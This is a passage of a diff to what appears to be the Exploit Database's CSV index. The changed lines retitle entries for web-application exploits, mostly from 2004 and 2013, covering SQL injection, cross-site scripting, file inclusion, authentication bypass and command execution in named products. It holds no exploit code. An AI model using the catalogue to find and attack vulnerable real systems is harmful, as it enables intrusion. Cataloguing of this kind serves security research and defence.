Module - Multiple Function Cross-Site Scripting",2004-06-11,"Janek Vind",php,webapps,0 +24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module - Multiple Function Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module - order Parameter SQL Injection",2004-06-11,"Janek Vind",php,webapps,0 24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 -24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Parameter Cross-Site Scripting",2004-06-11,"Janek Vind",php,webapps,0 +24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps,0 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - SSI.php Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 @@ -27604,8 +27605,8 @@ id,file,description,date,author,platform,type,port 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 -24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 -24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3 do_not_login' Parameter Authentication Bypass",2004-06-15,HEX,php,webapps,0 +24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - 'usersL.php3' Multiple SQL Injections",2004-06-15,HEX,php,webapps,0 +24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,php,webapps,0 24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 @@ -27613,7 +27614,7 @@ id,file,description,date,author,platform,type,port 24229,platforms/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 -24234,platforms/php/webapps/24234.html,"vBulletin 3.0.1 - newreply.php WYSIWYG_HTML Parameter Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps,0 +24234,platforms/php/webapps/24234.html,"vBulletin 3.0.1 - 'newreply.php?WYSIWYG_HTML' Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps,0 24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 @@ -27626,18 +27627,18 @@ id,file,description,date,author,platform,type,port 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"Fastream NETFile FTP/Web Server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 -24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 +24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 -24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 +24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id' Parameter SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],php,webapps,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 -24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Parameter Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 +24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.cgi Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - Remote File Inclusion",2004-07-19,"Adam Simuntis",php,webapps,0 @@ -27657,15 +27658,15 @@ id,file,description,date,author,platform,type,port 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - Site Parameter Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps,0 -24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_search.asp Typeen Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 -24314,platforms/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_edit.asp SQL Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 -24315,platforms/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE]_list.asp searchFor Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 -24316,platforms/asp/webapps/24316.txt,"XLineSoft ASPRunner 1.0/2.x - export.asp SQL Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 +24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 +24314,platforms/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 +24315,platforms/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 +24316,platforms/asp/webapps/24316.txt,"XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24317,platforms/asp/webapps/24317.txt,"XLineSoft ASPRunner 1.0/2.x - Database Direct Request Information Disclosure",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,multiple,webapps,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 -24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injections",2004-07-28,"Josh Gilmour",php,webapps,0 -24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - antiboard.php feedback Parameter Cross-Site Scripting",2004-07-28,"Josh Gilmour",php,webapps,0 +24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - 'antiboard.php' Multiple SQL Injections",2004-07-28,"Josh Gilmour",php,webapps,0 +24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - 'antiboard.php?feedback' Cross-Site Scripting",2004-07-28,"Josh Gilmour",php,webapps,0 24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0 @@ -27680,14 +27681,14 @@ id,file,description,date,author,platform,type,port 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 -24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - MapFrame.asp mapname Parameter Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0 +24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - 'MapFrame.asp?mapname' Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0 24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 -24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - address.html Multiple Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 -24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - settings.html Multiple Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 +24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - 'address.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 +24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - 'settings.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 24379,platforms/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - attachment.html attachmentpage_text_error Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 24380,platforms/php/webapps/24380.txt,"Merak Mail Server 7.4.5 - HTML Message Body Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 24381,platforms/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Full Path Disclosure",2004-07-17,Criolabs,php,webapps,0 @@ -27709,14 +27710,14 @@ id,file,description,date,author,platform,type,port 24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting",2004-08-24,sourvivor,php,webapps,0 24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal",2004-08-24,"Jerome Athias",cgi,webapps,0 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 -24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 +24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24420,platforms/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,asp,webapps,0 24422,platforms/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",asp,webapps,0 24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps,0 24425,platforms/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 @@ -27727,7 +27728,7 @@ id,file,description,date,author,platform,type,port 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php?question' SQL Injection",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 @@ -27736,7 +27737,7 @@ id,file,description,date,author,platform,type,port 24464,platforms/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 @@ -27748,7 +27749,7 @@ id,file,description,date,author,platform,type,port 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - 'install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 @@ -27759,11 +27760,11 @@ id,file,description,date,author,platform,type,port 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0 @@ -27772,11 +27773,11 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id' Parameter SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 +24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php?r_id' SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php title' Parameter Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php?title' Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 @@ -27793,9 +27794,9 @@ id,file,description,date,author,platform,type,port 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 - No Parameter Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass",2004-09-07,anonymous,cgi,webapps,0 -24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 -24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 +24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - 'thread-post.asp' Multiple Header CRLF Injections",2004-09-27,pigrelax,asp,webapps,0 +24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - 'ladder-log.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps,0 +24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - 'view-profile.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps,0 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 - Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",php,webapps,0 @@ -27804,7 +27805,7 @@ id,file,description,date,author,platform,type,port 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 -24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Parameter Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 +24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 - down.asp HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 @@ -27812,39 +27813,39 @@ id,file,description,date,author,platform,type,port 24613,platforms/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,php,webapps,0 24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - Function.php Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 -24616,platforms/php/webapps/24616.txt,"TUTOS - file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 -24617,platforms/php/webapps/24617.txt,"TUTOS - app_new.php t Parameter Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 +24616,platforms/php/webapps/24616.txt,"TUTOS - 'file_overview.php?link_id' SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 +24617,platforms/php/webapps/24617.txt,"TUTOS - 'app_new.php?t' Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard - search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard - profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary 